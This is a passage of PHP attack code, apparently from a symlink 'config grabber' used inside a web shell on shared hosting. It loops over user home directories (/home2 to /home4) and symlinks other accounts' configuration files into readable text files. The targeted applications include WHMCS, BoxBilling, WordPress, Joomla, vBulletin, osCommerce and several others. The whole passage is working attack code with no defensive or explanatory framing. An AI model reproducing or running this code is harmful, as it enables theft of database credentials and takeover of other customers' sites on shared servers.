@symlink('/home2/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home2/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home2/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home2/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home2/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home2/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home2/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home2/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home2/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home2/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home2/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home2/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home2/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home2/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home2/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home2/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home2/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home2/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home2/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home2/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt'); @symlink('/home2/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt'); @symlink('/home2/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt'); @symlink('/home2/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt'); @symlink('/home2/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt'); @symlink('/home2/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home2/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home2/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home2/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home2/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home2/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home2/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home2/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home2/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home2/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home2/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home2/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home2/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home2/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home2/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home2/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home2/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home2/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt'); //Home3 @symlink('/home3/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt'); @symlink('/home3/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt'); @symlink('/home3/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt'); @symlink('/home3/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt'); @symlink('/home3/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt'); @symlink('/home3/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt'); @symlink('/home3/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt'); @symlink('/home3/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt'); @symlink('/home3/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt'); @symlink('/home3/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt'); @symlink('/home3/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt'); @symlink('/home3/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt'); @symlink('/home3/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt'); @symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home3/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home3/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home3/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home3/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home3/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home3/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home3/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home3/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home3/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home3/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home3/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home3/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home3/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home3/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home3/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home3/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home3/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home3/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt'); @symlink('/home3/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt'); @symlink('/home3/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt'); @symlink('/home3/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt'); @symlink('/home3/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt'); @symlink('/home3/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt'); @symlink('/home3/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt'); @symlink('/home3/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt'); @symlink('/home3/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt'); @symlink('/home3/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt'); @symlink('/home3/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt'); @symlink('/home3/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt'); @symlink('/home3/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt'); @symlink('/home3/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt'); @symlink('/home3/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt'); @symlink('/home3/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home3/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home3/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home3/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home3/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home3/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home3/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home3/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home3/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home3/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home3/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home3/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home3/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home3/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home3/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home3/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home3/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home3/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home3/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home3/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt'); @symlink('/home3/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt'); @symlink('/home3/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt'); @symlink('/home3/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt'); @symlink('/home3/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt'); @symlink('/home3/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home3/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home3/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home3/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home3/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home3/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home3/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home3/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home3/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home3/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home3/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home3/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home3/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home3/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home3/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home3/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home3/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home3/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt'); //Home4 @symlink('/home4/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt'); @symlink('/home4/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt'); @symlink('/home4/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt'); @symlink('/home4/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt'); @symlink('/home4/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt'); @symlink('/home4/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt'); @symlink('/home4/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt'); @symlink('/home4/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt'); @symlink('/home4/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt'); @symlink('/home4/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt'); @symlink('/home4/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt'); @symlink('/home4/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt'); @symlink('/home4/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt'); @symlink('/home4/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home4/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home4/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home4/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home4/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home4/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home4/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home4/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home4/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home4/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home4/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home4/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home4/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home4/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home4/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home4/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home4/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home4/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home4/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt'); @symlink('/home4/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt'); @symlink('/home4/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt'); @symlink('/home4/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt'); @symlink('/home4/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt'); @symlink('/home4/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt'); @symlink('/home4/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt'); @symlink('/home4/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt'); @symlink('/home4/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt'); @symlink('/home4/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt'); @symlink('/home4/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt'); @symlink('/home4/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt'); @symlink('/home4/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt'); @symlink('/home4/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt'); @symlink('/home4/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt'); 